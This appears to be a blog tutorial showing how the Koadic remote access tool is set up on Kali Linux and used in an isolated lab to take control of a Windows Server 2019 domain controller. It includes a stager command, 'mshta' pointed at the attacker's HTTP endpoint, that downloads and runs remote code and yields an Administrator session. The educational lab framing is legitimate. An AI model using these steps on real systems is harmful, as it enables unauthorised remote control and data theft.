Hacking Windows Server with Koadic

Published in

System Weakness

5 min readApr 6, 2023

Koadic, or COM Command & Control or C2, is an open-source remote access tool (RAT) that executes commands on a compromised Windows machine. It is intended to exploit Microsoft Component Model (COM) technology for backdoors onto a Windows system. Koadic can be used for various things, including stealing data, reconnaissance, and deploying additional malware.

Koadic has a modular architecture and consists of a server-side component and a client-side component. The server-side component, usually installed on the attacker’s machine, generates the payloads and controls the compromised Windows machines. The client-side component, executed on the target machine, receives and executes commands on the compromised system.

In this ethical hacking project, within my isolated virtual environment, I utilized the Kali Linux machine as the attacker with the Koadic tool to connect to the Windows Server victim machine remotely.

I adhered to ethical standards throughout this project and never engaged in illegal or malicious activities. However, as a cybersecurity enthusiast, learning about potential vulnerabilities and attack vectors is crucial to better protect against them.

Disclaimer:

All information, techniques, and tools described in this write-up are for educational purposes only. Use anything in this write-up at your discretion; I cannot be held responsible for any damages caused to any systems or yourselves legally. Using all tools and techniques described in this write-up for attacking individuals or organizations without their prior consent is highly illegal. You must obey all applicable local, state, and federal laws. I accept no liability and will not be responsible for any misuse or damage caused by using the information herein.

Inside the Windows Server 2019 — Domain Controller Server Manager.

To start Koadic, I first opened a Kali Linux Terminal.

Then, typedKoadic → Pressed Enter.

Inside the Koadic tool.

Koadic contains six stagers and 46 implants. The stagers are typically used during the initial stage of the attack to establish a foothold on the target system and to download and execute additional payloads.

Implants refer to the payloads downloaded and executed on the compromised Windows machine after the initial connection is established using a stager. Implants are designed to give the attacker persistent access to the compromised system and enable the attacker to perform various operations on the compromised system.

Typed options → Pressed Enter.

Options displayed. Notice the SRVHOST IP address is 10.60.0.7, and the SRVPORT is 9999.

Verified the IP Address of the Kali host is 10.60.0.7 with ifconfig.

I changed ENDPOINT from UOdwA to labinstall.

Typed set ENDPOINT labinstall → pressed Enter.

Typed options → Pressed Enter.

The ENDPOINT value was set to labinstall.

To start, Koadic typed run and pressed Enter.

Koadic is listening.

Back on the Windows Server Domain Controller, I opened Command Prompt and typed ipconfig to take note of the IP Address: 10.60.0.9.

There are multiple ways to send this to the victim machine but to demonstrate how this tool performs; I ran the mshta script in the Windows server command prompt of the victim machine.

Typed mshta http://10.60.0.7:9999/labinstall → press Enter.

We have a Zombie logged in as MARVEL\Administrator on the AD-DC on the Windows Server 2019.

Typed zombies → Pressed Enter.

We have one Zombie alive at IP address 10.60.0.9, the Windows Server victim machine.

In Koadic, a zombie refers to a compromised Windows machine under an attacker’s control using the Koadic Rat. Once a Windows machine is compromised using Koadic, the attacker can use the machine as a Zombie to perform various tasks, including stealing data, launching additional attacks, and conducting reconnaissance.